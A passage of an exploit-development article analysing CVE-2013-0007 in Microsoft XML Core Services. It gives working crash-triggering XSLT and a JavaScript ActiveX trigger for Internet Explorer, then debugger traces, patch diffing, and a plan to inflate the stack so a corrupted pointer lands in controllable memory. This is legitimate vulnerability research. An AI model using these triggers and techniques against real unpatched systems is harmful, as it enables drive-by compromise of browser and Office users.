    4.2 - The offset-to-value translation

  5 - Further work

  6 - Conclusion

  7 - Thanks

  8 - References

  9 - Code


--[ 1 - Introduction

As a 'new school' binary vulnerability researcher, I've found it somewhat
challenging to learn the subject in the times when it's become highly
commercialized, which pushed the detailed technical security advisories
and technical analyses of regular vulnerabilities out of the public
access. While this article presents a funny research in the first place,
it was as well composed with beginner fellows in mind: aiming to
summarize the various foundational skills, techniques, and thinking
patterns required to analyze and control a modern and mundane, yet a
somewhat off-beat binary vulnerability. Besides revisiting the
foundation, the article introduces a few pieces of novel information,
such as Microsoft XML Core Services internals and some observations on
heap spraying and stack manipulations with the latest Internet Explorer.

The article covers a comprehensive deep technical analysis and control of
the remote code execution vulnerability in Microsoft XML Core Services,
CVE-2013-0007, for the purpose of self-patching. All the research and
proof-of-concept prototyping were done with a deliberately synthetic
platform, based on x86 Windows 7 with IE11 (which didn't even exist in
the time of the vulnerability discovery), with all the updates installed
but the one specific patch, and with the full page heap setting enabled
for the target process.

Although the vulnerability is two years old, the research is totally
relevant to the modern situation. The author is not aware of any public
or private exploits, as well as technical analyses for the described
vulnerability, which is actually quite interesting and unique. Regarding
the vulnerable software, remote code execution bugs in Microsoft XML Core
Services are not rare, if not under-represented in public sources, as one
was discovered by the low-skilled author herself in late 2014
(CVE-2014-4118). Vulnerabilities in Microsoft XML may be highly critical
because they allow not only for a drive-by exploitation of the Internet
Explorer, but also, for multiple impact vectors beyond the browser.

The code provided in this article is totally unreliable, guaranteed by the
highly entropic nature of the vulnerability that causes the minimum 25%
probability of an uncontrollable crash, as well as by superficial coding
and testing choices. In addition, the statements concerning undocumented
Windows internals were heavily based on debugging observations on a
couple of testing systems, and should be verified with reverse
engineering.


--[ 2 - The vulnerability

The vulnerability in question is a critical remote code execution bug in
Microsoft XML Core Services, relevant to every edition of the Windows
operating systems existing at the time of the discovery, according to the
original security bulletin. It was patched in early 2013 with the
Microsoft Security Bulletin MS13-002 [1] and the update KB2757638 (on x86
Windows 7), that was later superseded with KB2939576.

Although the bug can be reproduced with the four major versions of the
MSXML module (3, 4, 5, 6) that may co-exist and even execute side by side
on the target system, only version 6 is invoked by default on modern
systems.

Version 3 is still present on default installations of Windows 7 and 8.1
for backward compatibility, contained within the module msxml3.dll, and
may be invoked in the same script with version 6 by explicitly creating
the "MSXML2.DOMDOCUMENT.3.0" ActiveXObject. Version 5 was shipped with
Microsoft Office up to version 2007, and version 4 may be present on the
system with 3rd party software as part of the obsolete MSO SDK.
Additionally, some fuzzing efforts allowed us to deduce that versions 4,
5 and 6 are largely based on a shared code base, while version 3 has a
distinctively different code with version-specific bugs.

As the most actual version 6 is contained in the module msxml6.dll, all
further references to Microsoft XML internals will refer to the module
msxml6.dll of version 6.30.7600.16385.


--[ 2.1 - The trigger

The original crash inducing code published [2] without much details by the
researcher was a piece of XSLT code:


<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">

      <xsl:template name="main_template" match="/">
              <xsl:for-each select="*">
                      <xsl:apply-templates/>
              </xsl:for-each>
      </xsl:template>

      <xsl:template name="xxx_nonexistent" match="//xxx[position()]" />

</xsl:stylesheet>


XSLT is the standard extension to XML which serves to perform analysis and
transformation of the given XML data according to the given rules, and is
itself implemented in XML. This brings up the idea that the bug can
possibly be triggered via any application that uses the XSL
transformation functionality of the Microsoft XML Core Services.


--[ 2.2 - The impact vectors

After doing some research on the XSL transformation functionality in
various Windows software, I've come up with the following draft table of
theoretically possible impact vectors and tested some of them:


*------------------------------------------------------------------------*
|# | Target app        | Technique             | Testing comments        |
|--+-------------------+-----------------------+-------------------------|
|1 | cscript           | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Crash (Windows 7)       |
|--+-------------------+-----------------------+-------------------------|
|2 | Internet Explorer | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Crash                   |
|  |                   |                       | (Windows 7 + IE9/IE11)  |
|--+-------------------+-----------------------+-------------------------|
|3 | DotNetNuke        | Unknown               | From the original       |
|  |                   |                       | publication, not tested |
|--+-------------------+-----------------------+-------------------------|
|4 | SharePoint        | Unknown               | From the original       |
|  |                   |                       | publication, not tested |
|--+-------------------+-----------------------+-------------------------|
|5 | Microsoft Word    | Call to MSXML ActiveX |                         |
|  |                   | via a macro           | Crash (Office 2010)     |
|--+-------------------+-----------------------+-------------------------|
|6 | Microsoft Word    | Native XML-XSL        |                         |
|  |                   | transformation via an |                         |
|  |                   | XSD scheme            | May be possible if      |
|  |                   |                       | relies upon MSXML*1,    |
|  |                   |                       | not tested              |
|--+-------------------+-----------------------+-------------------------|
|7 | Microsoft Word    | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()|                         |
|  |                   | via an embedded       |                         |
|  |                   | JavaScript in a       | Crash (Office 2007)     |
|  |                   | Microsoft ActiveX     |                         |
|  |                   | control               |                         |
|--+-------------------+-----------------------+-------------------------|
|8 | Microsoft Word    | Call to the directly  |                         |
|  |                   | embedded ActiveX      | Not possible*2          |
|--+-------------------+-----------------------+-------------------------|
|9 | Microsoft Project | Native XML-XSL        |                         |
|  |                   | transformation        | May be possible*3,      |
|  |                   |                       | not tested              |
|--+-------------------+-----------------------+-------------------------|
|* | Arbitrary app*4   | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Definitely possible,    |
|  |                   |                       | not tested              |
*------------------------------------------------------------------------*

*1 Applying an XSLT Transform [Word 2003 XML Reference]
   http://msdn.microsoft.com/en-us/library/office/
   ee364545(v=office.11).aspx

*2 OOXML does not implement the functionality to call ActiveX methods,
   although it can instantiate them:

   [MS-OE376]: Office Implementation Information for ECMA-376 Standards
   Support
   http://msdn.microsoft.com/en-us/library/ff533853(v=office.12).aspx

*3 How to: Use XSLT Transformations with Project XML Data Interchange
   Files
   http://msdn.microsoft.com/en-us/library/office/
   bb968529(v=office.12).aspx

*4 ...which uses MSXML's COM/ActiveX module


The above table of possible impact vectors is far from being exhaustive.
Most obviously, it should include at least the other Microsoft Office
applications, in addition to Word and Project.


--[ 2.3 - Analyzing the crash

One of the ways to trigger the XSL transformation functionality of
Microsoft XML Core Services is to call the transformNode() method from
the COM/ActiveX object MSXML2.DOMDocument.6.0 via e.g. JavaScript:


  xslcontent='<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/
  Transform"
  version="1.0"><xsl:template name="main_template" match="/"><xsl:for-each
  select="*"><xsl:apply-templates/></xsl:for-each></xsl:template><
  xsl:template
  name="xx" match="x[position()]" /></xsl:stylesheet>';

  srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
  xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
  xsltTree.loadXML(xslcontent);
  alert("crash");
  srcTree.transformNode(xsltTree);


The above code, when executed either with the help of cscript command line
utility or from within an Internet Explorer web page, will produce a
crash due to an invalid memory read attempt, similar to the following:


  (5f8.9d4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=ad9004d6 ebx=0e419ff0 ecx=0e419f42 edx=6f6e4430
  esi=0e419f40 edi=04d6ac70 eip=6f6f9c85 esp=04d6ac6c
  ebp=04d6ad88 iopl=0         nv up ei pl nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00010206
  msxml6!XEngine::stns+0x6:
  6f6f9c85 8b5008        mov     edx,dword ptr [eax+8]
  ds:0023:ad9004de=????????


An observation can be made across multiple tests that the crashing memory
address varies a little bit from test to test, but always falls into a
somewhat persistent address range in the kernel memory, which actually
causes the access violation.

Looking at the stack dump we can surmise that the crash occurs during the
processing of a particular XSLT instruction, represented by the function
XEngine::stns(), by the MSXML's XEngine' virtual machine:


  0:007> k
  ChildEBP RetAddr
  04d6ac68 6f6e60cc msxml6!XEngine::stns+0x6
  04d6ad88 6f6e60cc msxml6!XEngine::frame+0x84
  04d6ae08 6f6f3e2d msxml6!XEngine::frame+0x84
  04d6aeb8 6f75ffb0 msxml6!XEngine::execute+0x1b4
  04d6af14 6f75fee3 msxml6!XUtility::executeXCode+0x90
  04d6af68 6f75fe2b msxml6!XUtility::transformNode+0x4a
  04d6afd4 6f75fda2 msxml6!DOMNode::transformNode+0xa6
  04d6afe8 6f7460c9 msxml6!DOMDocumentWrapper::transformNode+0x17
  04d6b004 6f760b71 msxml6!DOMNode::_invokeDOMNode+0x30e
  ...


Indeed, further analysis reveals a virtual machine execution loop, in
which the function XEngine::frame() is responsible for the execution of
the current fragment of 'XCode'. XCode is essentially a dynamically
constructed sequence of pointers to member functions of the XEngine class
along with their arguments, that was compiled from the input XSLT markup:


  0:007> u msxml6!XEngine::frame l30
  msxml6!XEngine::frame:
  ...
  6f6e6092 call    msxml6!XEngineFrame::initFrame (6f6e72c3)
  ...
  ; increment the pointer to the chain of XEngine functions:
  6f6e60b8 add     dword ptr [esi+0A0h],10h
  ; loop:
  6f6e60bf mov     eax,dword ptr [esi+0A0h];retrieve the next XEngine proc
  6f6e60c5 mov     ecx,dword ptr [eax+4] ; retrieve the argument
  6f6e60c8 add     ecx,esi ; increment the pointer to a global structure
  6f6e60ca call    dword ptr [eax] ; call the XEngine proc
  6f6e60cc add     dword ptr [esi+0A0h],eax
  6f6e60d2 je      msxml6!XEngine::frame+0x95 (6f6e60dd)
  6f6e60d4 cmp     byte ptr [esi+0B8h],0
  6f6e60db je      msxml6!XEngine::frame+0x77 (6f6e60bf) ; loop


The XCode which corresponds to the vulnerable XSLT code may be observed by
dumping of the current XEngine frame, which reveals the list of pointers
to functions to be called sequentially, as well as their arguments:


  0:007> p
  eax=06ca9ff4 ebx=06ca9ff0 ecx=0513b010 edx=0513b0a0 esi=06ca9f40
  edi=0513b010 eip=6f6e60bf esp=0513b010 ebp=0513b088 iopl=0
  nv up ei pl nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
  efl=00000206

  msxml6!XEngine::frame+0x77:
  6f6e60bf mov     eax,dword ptr [esi+0A0h] ds:0023:06ca9fe0=6cf0c806

  0:007> dds poi(esi+a0)
  06c8f05c  6f6e6046 msxml6!XEngine::frame
  06c8f060  00000000
  06c8f064  00000030
  06c8f068  c0c0c000
  06c8f06c  6f6f9bba msxml6!XEngine::ldc_i
  06c8f070  00000000
  06c8f074  00000000
  06c8f078  6f6f16e8 msxml6!XEngine::br
  06c8f07c  00000000
  06c8f080  00000128
  06c8f084  6f6e6046 msxml6!XEngine::frame
  06c8f088  00000000
  06c8f08c  000000d0
  06c8f090  c0c0c000
  06c8f094  6f6e7868 msxml6!XEngine::ctxt
  06c8f098  00000000
  06c8f09c  0000000c
  06c8f0a0  6f6e7399 msxml6!XEngine::ch
  06c8f0a4  00000000
  06c8f0a8  00000024
  06c8f0ac  06c8bde4
  06c8f0b0  6f6f16e8 msxml6!XEngine::br
  06c8f0b4  00000000
  06c8f0b8  0000000c
  06c8f0bc  6f6f9c7f msxml6!XEngine::stns
  06c8f0c0  00000002
  06c8f0c4  6f6fcf32 msxml6!XEngine::locldns
  06c8f0c8  00000000
  06c8f0cc  00000050
  06c8f0d0  6f6fa250 msxml6!XEngine::brns
  06c8f0d4  00000000
  06c8f0d8  0000009c
  ...


Each function of the XEngine class works with an undocumented global s
structure, referenced by the registers esi or ecx within the class code.
The structure holds pointers to MSXML's virtual address tables, stack
pointers and some other values:


  0:007> dds esi l40
  06ca9f40  6f6c1754 msxml6!SXPQCompiler::`vftable'
  06ca9f44  6f6e75d8 msxml6!XEngine::`vftable'
  06ca9f48  00000008
  06ca9f4c  6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable'
  06ca9f50  6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable'
  06ca9f54  06ca9f40
  06ca9f58  06ca9f78
  06ca9f5c  06c8bda8
  06ca9f60  00000000
  06ca9f64  00000000
  06ca9f68  00000000
  06ca9f6c  00000000
  06ca9f70  00000000
  06ca9f74  00000000
  06ca9f78  6f6e7620 msxml6!XRuntime::`vftable'
  ...


In the vulnerable code, the pointer to the structure is being incremented
in the XEngine loop, within the XEngine::frame() function, by the value
provided in the XCode frame:


  ; loop:
  6f6e60bf mov     eax,dword ptr [esi+0A0h];retrieve the next XEngine proc
  6f6e60c5 mov     ecx,dword ptr [eax+4] ; retrieve the argument
  6f6e60c8 add     ecx,esi ; increment the pointer to the global structure


The reason of the crash is that, immediately before entering the
XEngine::stns() function, the pointer to the global structure is
incremented by the invalid value of 2:


  msxml6!XEngine::frame+0x82:
  6f6e60ca call    dword ptr [eax];ds:0023:0d5af0bc={msxml6!XEngine::stns}

  0:007> u eip-10
  msxml6!XEngine::frame+0x72:
  ...
  6f6e60bf mov     eax,dword ptr [esi+0A0h]
  6f6e60c5 mov     ecx,dword ptr [eax+4]
  6f6e60c8 add     ecx,esi
  6f6e60ca call    dword ptr [eax]

  0:007> dds poi(esi+a0)
  06c8f0bc  6f6f9c7f msxml6!XEngine::stns
  06c8f0c0  00000002


Next, when the improperly incremented pointer is dereferenced in
XEngine::stns(), it leads to the misaligned memory access and invalid
values being retrieved, causing the crash:


  msxml6!XEngine::stns+0x6:
  6f6f9c85 mov     edx,dword ptr [eax+8] ds:0023:b010051b=????????

  ; where did eax come from?
  0:007> u eip-6
  msxml6!XEngine::stns:
  ; should point to the global structure
  6f6f9c7f mov     eax,dword ptr [ecx+0B0h]
  6f6f9c85 mov     edx,dword ptr [eax+8]
  ...
  0:007> dds ecx
  ; looks like total garbage, but it's actually due to the misalignment...
  06ca9f42  75d86f6c shell32!__dyn_tls_init_callback (shell32+0x5f6f6c)
  06ca9f46  00086f6e
  06ca9f4a  75c80000 shell32!__dyn_tls_init_callback (shell32+0x4f0000)
  06ca9f4e  75d06f6e shell32!__dyn_tls_init_callback (shell32+0x576f6e)
  06ca9f52  9f406f6e
  ...
  ; ...and the correctly aligned structure is actually 2 bytes higher:
  0:007> dds ecx-2
  06ca9f40  6f6c1754 msxml6!SXPQCompiler::`vftable'
  06ca9f44  6f6e75d8 msxml6!XEngine::`vftable'
  06ca9f48  00000008
  06ca9f4c  6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable'
  06ca9f50  6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable'
  06ca9f54  06ca9f40
  06ca9f58  06ca9f78
  06ca9f5c  06c8bda8
  06ca9f60  00000000
  ...


At this point the vulnerability does not look very promising: the crashing
memory address being read from a valid pointer to internal program data,
shifted by strictly two bytes.


--[ 2.4 - Estimating exploitability

Let's observe the vulnerable XCode frame once again:


  0:007> dds poi(esi+a0)
  06c8f05c  6f6e6046 msxml6!XEngine::frame
  06c8f060  00000000
  06c8f064  00000030
  06c8f068  c0c0c000
  06c8f06c  6f6f9bba msxml6!XEngine::ldc_i
  06c8f070  00000000
  06c8f074  00000000
  06c8f078  6f6f16e8 msxml6!XEngine::br
  06c8f07c  00000000
  06c8f080  00000128
  06c8f084  6f6e6046 msxml6!XEngine::frame
  06c8f088  00000000
  06c8f08c  000000d0
  06c8f090  c0c0c000
  06c8f094  6f6e7868 msxml6!XEngine::ctxt
  06c8f098  00000000
  06c8f09c  0000000c
  06c8f0a0  6f6e7399 msxml6!XEngine::ch
  06c8f0a4  00000000
  06c8f0a8  00000024
  06c8f0ac  06c8bde4
  06c8f0b0  6f6f16e8 msxml6!XEngine::br
  06c8f0b4  00000000
  06c8f0b8  0000000c
  06c8f0bc  6f6f9c7f msxml6!XEngine::stns
  06c8f0c0  00000002
  06c8f0c4  6f6fcf32 msxml6!XEngine::locldns
  06c8f0c8  00000000
  06c8f0cc  00000050
  06c8f0d0  6f6fa250 msxml6!XEngine::brns
  06c8f0d4  00000000


We can see that, at some point after the execution of the XEngine::stns()
function, the XEngine::brns() function will be called, that contains a
dynamic call:


  msxml6!XEngine::brns:
  712da250 mov     edi,edi
  712da252 push    esi
  712da253 mov     esi,ecx
  712da255 mov     ecx,dword ptr [esi+0A4h]
  712da25b mov     eax,dword ptr [ecx]  ; {msxml6!ChildNodeSet::`vftable'}
  712da25d call    dword ptr [eax] ; dynamic call


The dynamic call address in XEngine::brns() derives from the same place in
memory where XEngine::stns() wrote something:


  msxml6!XEngine::stns:
  6f6f9c7f mov     eax,dword ptr [ecx+0B0h]
  6f6f9c85 mov     edx,dword ptr [eax+8]
  6f6f9c88 push    esi
  6f6f9c89 lea     esi,[edx+0Ch]
  6f6f9c8c mov     dword ptr [eax+8],esi
  6f6f9c8f mov     eax,dword ptr [edx+4]
  6f6f9c92 push    8
  6f6f9c94 mov     dword ptr [ecx+0A4h],eax ; wrote something
  6f6f9c9a pop     eax
  6f6f9c9b pop     esi
  6f6f9c9c ret


More precisely, the written value derives from the crashing memory
address:


  msxml6!XEngine::stns:
  6f6f9c7f mov     eax,dword ptr [ecx+0B0h]
  6f6f9c85 mov     edx,dword ptr [eax+8] ; read (crashes here)
  6f6f9c88 push    esi
  6f6f9c89 lea     esi,[edx+0Ch]
  6f6f9c8c mov     dword ptr [eax+8],esi
  6f6f9c8f mov     eax,dword ptr [edx+4] ; read
  6f6f9c92 push    8
  6f6f9c94 mov     dword ptr [ecx+0A4h],eax ; write
  6f6f9c9a pop     eax
  6f6f9c9b pop     esi
  6f6f9c9c ret


Which means that, in the case that the crashing memory was readable, an
address value would be read from that memory, to be call'ed later within
XEngine::brns(). What happens here is probably some manipulations with the
virtual address tables of the XEngine class.

However in the vulnerable context, because the global pointer is only
corrupted in stns() while being intact in brns(), only two upper bytes of
the final memory destination will be overwritten:


  ; read(+B0+2)=0c6f0027d, write(+A4+2)=0c79c027d, call(+A4)=027dc7b4:
  0:005> dpp ecx-2 L30
  ...
        04388840  045ea780 711d31e8 msxml6!Vector::`vftable'
        04388844  0438bab8 711d1754 msxml6!SXPQCompiler::`vftable'
        04388848  04389484 71209c7f msxml6!XEngine::stns
  +0A4h 0438884c  027dc7b4 711f44b8 msxml6!RTFNodeSet::`vftable'
        04388850  027dc79c 711f44b8 msxml6!RTFNodeSet::`vftable'
        04388854  045e02b0 711ddcf8 msxml6!Name::`vftable'
  +0B0h 04388858  027dc5d0 027dc6f0
        0438885c  027dc6f0 027dc770
        04388860  00000000


In other words, it might be possible to control at most the higher word
of the pointer used to retrieve the dynamic call address.

Next, because of the 2-bytes misaligned memory read in XEngine::stns(),
the crashing address is essentially a composition of two valid stack
pointers:


  msxml6!XEngine::stns+0x6:
  6f6f9c85 8b5008   mov  edx,dword ptr [eax+8] ds:0023:b040053a=????????

  ; composed from the two valid stack pointers:
  0:007> dds ecx+b0-2
  0d5c9ff0  0532af20
  0d5c9ff4  0532b040

  ; both of them on the stack:
  0:007> k
  ChildEBP RetAddr
  0532af18 6f6e60cc msxml6!XEngine::stns+0x6
  0532b038 6f6e60cc msxml6!XEngine::frame+0x84
  ; ...the pointers
  0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84
  0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4


That is, the upper word of the crashing memory address is equal to the
lower word of the stack address, located somewhere within the local
variables frame of XEngine::frame(). Which means that, in this particular
vulnerability context, the crashing memory address depends exclusively on
the stack layout.

Next, it was mentioned in the original publication that slightly different
crashes could be observed by modifying the vulnerable XSLT code. Indeed,
the following XSLT code would cause a 6-bytes misaligned memory access in
XEngine::stns():


<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">

      <xsl:template name="main_template" match="/">
              <xsl:for-each select="*">
                      <xsl:apply-templates/>
              </xsl:for-each>
      </xsl:template>

      <xsl:template name="xxx_nonexistent"
      match="//xxx[position()=last()]" />

</xsl:stylesheet>


However, a 6-bytes misaligned pointer crash is not possible to control,
because it can only yield the null page read:


  0:005> dpp ecx+6 L30
  ...
  042a8840  0480a760 715e31e8 msxml6!Vector::`vftable'
  042a8844  042abab8 715e1754 msxml6!SXPQCompiler::`vftable'
  042a8848  042a9484 71619c7f msxml6!XEngine::stns
  042a884c  0269c684 716044b8 msxml6!RTFNodeSet::`vftable'
  042a8850  0269c66c 716044b8 msxml6!RTFNodeSet::`vftable'
  042a8854  048002b0 715edcf8 msxml6!Name::`vftable'
  042a8858  0269c4a0 0269c5c0
  042a885c  0269c5c0 0269c640
  042a8860  00000000 ; it's always null
  042a8864  00000000


All in all, the vulnerability looks quite exploitable at this point.


--[ 2.5 - Patch analysis and the root cause

I decided to look at the exact root cause of the vulnerability in order
to see if there might be any other ways to control it besides messing
with the thread stack. May the pointer incrementing value be controlled?
Or maybe, any opportunities to trigger the vulnerability with a
completely different input XSLT code? Because the vulnerability is
already patched, it's possible to leverage patch analysis for the root
cause investigation.

From binary diffing of the patch we can see that the crashing procedure
XEngine::stns() was not even patched. Instead, the XEngine::frame()
procedure was patched by completely removing the pointer incrementing
code:


*---------------------------------------------------*
| Vulnerable code         | Patched code            |
|-------------------------+-------------------------|
| loc_726C60BF:           | loc_726C6BB6:           |
| mov     eax, [esi+0A0h] | mov     eax, [esi+9Ch]  |
| mov     ecx, [eax+4]    | mov     ecx, esi        |
| add     ecx, esi        | -                       |
| call    dword ptr [eax] | call    dword ptr [eax] |
| add     [esi+0A0h], eax | add     [esi+9Ch], eax  |
*---------------------------------------------------*


But where exactly did the invalid incremental value originate from?

Among few dozens of modified procedures in the patch, there is a bunch of
XCodeGen class functions, all of them initializing the XCode frame:


  .text:72733631 ; public: void __thiscall XCodeGen::brns(unsigned char *)
  .text:72733631 ?brns@XCodeGen@@QAEXPAE@Z proc near
  .text:7273363A                 xor     esi, esi
  .text:7273363C                 mov     edx, offset XEngine::brns(void)
  .text:72733641                 mov     [eax+4], esi ; the argument
  .text:72733644                 mov     [eax], edx ; the function address


In the above code, two XCode frame slots are initialized: both the call
pointer (set to the address of XEngine::brns() in this case) and the
incremental value (set to zero). In fact, all functions of the XCodeGen
class initialize the incremental value to zero. But then, in some cases
the value becomes corrupted after the call to XCodeGen::ensureCapacity():


  .text:726C6B93 ; public: void __thiscall XCodeGen::ch(class NavFilter *)
  .text:726C6B93 ?ch@XCodeGen@@QAEXPAVNavFilter@@@Z proc near
  .text:726C6B93
  .text:726C6B93 arg_0           = dword ptr  8
  .text:726C6B93
  .text:726C6B93                 mov     edi, edi
  .text:726C6B95                 push    ebp
  .text:726C6B96                 mov     ebp, esp
  .text:726C6B98                 push    ebx
  .text:726C6B99                 push    esi
  .text:726C6B9A                 push    edi
  .text:726C6B9B                 push    10h
  .text:726C6B9D                 mov     esi, ecx
  .text:726C6B9F                 mov     edi, offset XEngine::ch(void)
  .text:726C6BA4                 xor     ebx, ebx
  .text:726C6BA6                 call    XCodeGen::ensureCapacity(uint)
  .text:726C6BAB                 mov     [eax], edi
  ; ebx *should* be zero unless ensureCapacity() messes with it:
  .text:726C6BAD                 mov     [eax+4], ebx


And the actual corruption takes place inside the
ASTCodeGen::xpathFunctionCode() function, which sets some bits of the
incremental value with either mask 2 or 4 (or possibly, both):


  msxml6!ASTCodeGen::xpathFunctionCode+0x347:
  720abf20 5e              pop  esi
  720abf21 5b              pop  ebx
  720abf22 5d              pop  ebp
  720abf23 c20400          ret  4
  720abf26 8b4604          mov  eax,dword ptr [esi+4]
  720abf29 8b4018          mov  eax,dword ptr [eax+18h]
  720abf2c 83481002        or   dword ptr [eax+10h],2
  ...
  msxml6!ASTCodeGen::xpathFunctionCode+0x12a:
  720ef0f6 83481004        or   dword ptr [eax+10h],4
  720ef0fa 8b4e04          mov  ecx,dword ptr [esi+4]
  720ef0fd e80a000000      call msxml6!XCodeGen::last (720ef10c)
  720ef102 e918cefbff      jmp  msxml6!ASTCodeGen::xpathFunctionCode+0x346


There is a jump table, likely a case switch, that refers to both of the
bit-setting code branches:


  ; DATA XREF: ASTCodeGen::xpathFunctionCode(FunctionCallNode *)+31r
  .text:72738022 off_72738022    dd offset loc_7271C27D
  .text:72738022                 dd offset loc_7273731D
  .text:72738022                 dd offset loc_7273CD36
  .text:72738022                 dd offset loc_7273DB58
  .text:72738022                 dd offset loc_727373BF
  .text:72738022                 dd offset loc_726FD455
  .text:72738022                 dd offset loc_726FDD0C
  .text:72738022                 dd offset loc_72737FD8
  .text:72738022                 dd offset loc_7271C388
  .text:72738022                 dd offset loc_72737393
  .text:72738022                 dd offset loc_7273F9A6
  .text:72738022                 dd offset loc_72737FEF
  .text:72738022                 dd offset loc_726F95D7
  .text:72738022                 dd offset loc_727373BF
  .text:72738022                 dd offset loc_727373BF
  .text:72738022                 dd offset loc_727373C6
  .text:72738022                 dd offset loc_726FF1C8
  .text:72738022                 dd offset loc_7271C3D0
  .text:72738022                 dd offset loc_727373BF
  .text:72738022                 dd offset loc_726FAD0A
  .text:72738022                 dd offset loc_7273E8DD
  .text:72738022                 dd offset loc_726FAF60
  .text:72738022                 dd offset loc_726FA10C
  .text:72738022                 dd offset loc_726F9CCB
  .text:72738022                 dd offset loc_726FCCEA


By looking through other switch cases in the table we can confirm that
none of them performs any other write operations with the memory location
in question. Thus, the pointer incremental value can only be set to the
three values: 2, 4, and 6 (2 OR 4), of which only the first case would be
controllable.

Next, because the actual corrupting code (the OR instruction) was not
eliminated by the patch, but rather, the incrementing instruction was
eliminated, we have to assume that there might be other code paths which
rely upon corrupted values. But the likeliness of this is low beyond the
scope of the XEngine class, of which the main function XEngine::frame()
was already patched. So, I dropped this opportunity as not worthy of
investigation.

Another opportunity that must be considered is, if it might be possible to
control the original values from which the crashing pointer was composed.
But, in the debugging context it's clear that the values are just
pointers to local variables and thus unlikely to be controlled directly:


  msxml6!XEngine::stns+0x6:
  6f6f9c85 8b5008    mov   edx,dword ptr [eax+8] ds:0023:b040053a=????????

  0:007> dds ecx+b0-2
  0d5c9ff0  0532af20
  0d5c9ff4  0532b040

  0:005> u eip-30 l30
  msxml6!XEngine::execute+0xad:
  ...
  711c3d8c 8d45a4          lea     eax,[ebp-5Ch]
  ...
  711c3d8f 8983a4000000    mov     dword ptr [ebx+0A4h],eax


As a side note, the patch analysis for this case would not have been
possible without prior knowledge of the crash triggering input and the
crash context, because the patched code is so far away from both the
crashing code and the vulnerability root cause, while the volume of code
modifications introduced by the patch is huge.


--[ 3 - The control

At this point it's clear that the only reasonable way to control the
vulnerability is to inflate the stack so that the crashing pointer would
fall into userland memory area that can possibly be controlled:


  msxml6!XEngine::stns+0x6:
  6f6f9c85 8b5008    mov   edx,dword ptr [eax+8] ds:0023:b040053a=????????

  0:007> u eip-6
  msxml6!XEngine::stns:
  6f6f9c7f 8b81b0000000    mov     eax,dword ptr [ecx+0B0h]
  6f6f9c85 8b5008          mov     edx,dword ptr [eax+8]

  0:007> dds ecx+b0-2
  0d5c9ff0  0532af20
  0d5c9ff4  0532b040

  0:007> k
  ChildEBP RetAddr
  0532af18 6f6e60cc msxml6!XEngine::stns+0x6
  0532b038 6f6e60cc msxml6!XEngine::frame+0x84
  0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84
  0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4


Given the above listing, it would be nice to have the second
XEngine::frame() call happening around e.g. 0x05320300, that would send
the crashing pointer value 0x0300053a to XEngine::stns(), pointing to the
heap. Which requires that, prior to the vulnerable procedure call, the
thread must make function calls and stack frame allocations worth of
approximately 42 kilobytes of stack memory and never pop them.


--[ 3.1 - Inflating the stack 1: XSLT recursion

The obvious way to inflate the stack is to generate a recursion on the
stack, which should be possible with any dynamic technology available to
the target application. My first idea was to use XSLT itself for this.
Indeed, the following code, which is the classical Hanoi algorithm
implementation in XSLT, will produce a massive recursion on the stack (
for the record, it might even DoS the browser with big enough $n):


<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">
  <xsl:variable name="n">
    <xsl:value-of select="//arg/@n"/>
  </xsl:variable>
  <xsl:element name="hanoi-solve">
  <xsl:call-template name="dohanoi">
    <xsl:with-param name="n" select="30"/>
    <xsl:with-param name="to" select="3"/>
    <xsl:with-param name="from" select="1"/>
    <xsl:with-param name="using" select="2"/>
  </xsl:call-template>
</xsl:element>
</xsl:template>

<xsl:template name="dohanoi">
  <xsl:param name="n"/>
  <xsl:param name="to"/>
  <xsl:param name="from"/>
  <xsl:param name="using"/>
  <xsl:if test="number($n) > 0">

  <xsl:call-template name="dohanoi">
    <xsl:with-param name="n" select="number($n) - 1"/>
    <xsl:with-param name="to" select="$using"/>
    <xsl:with-param name="from" select="$from"/>
    <xsl:with-param name="using" select="$to"/>
  </xsl:call-template>

  <xsl:element name="move">
  <xsl:attribute name="from">
    <xsl:value-of select="$from"/>
  </xsl:attribute>
  <xsl:attribute name="to">
    <xsl:value-of select="$to"/>
  </xsl:attribute>
  </xsl:element>

  <xsl:call-template name="dohanoi">
    <xsl:with-param name="n" select="number($n) - 1"/>
    <xsl:with-param name="to" select="$to"/>
    <xsl:with-param name="from" select="$using"/>
    <xsl:with-param name="using" select="$from"/>
  </xsl:call-template>

  <xsl:for-each select="*">
    <xsl:apply-templates/>
  </xsl:for-each>

</xsl:if>
</xsl:template>

<xsl:template name="xxx_nonexistent" match="//xxx[position()]" />

</xsl:stylesheet>


Sadly, the XSLT-based recursion inflates the stack above and not below the
crashing pointer sources stack frame, and thus the recursion does not
affect the crashing context at all:


  ChildEBP RetAddr
  0ed783e8 711b60cc msxml6!XEngine::stns
  0ed78588 711b60cc msxml6!XEngine::frame+0x84
  0ed78728 711b60cc msxml6!XEngine::frame+0x84
  0ed788c8 711b60cc msxml6!XEngine::frame+0x84
  0ed78a68 711b60cc msxml6!XEngine::frame+0x84
  0ed78c08 711b60cc msxml6!XEngine::frame+0x84
  0ed78da8 711b60cc msxml6!XEngine::frame+0x84
  ; skipped many frame()'s
  0ed7b5e8 msxml6!XEngine::frame+0x84
  ; --> the vulnerable stack frame <--
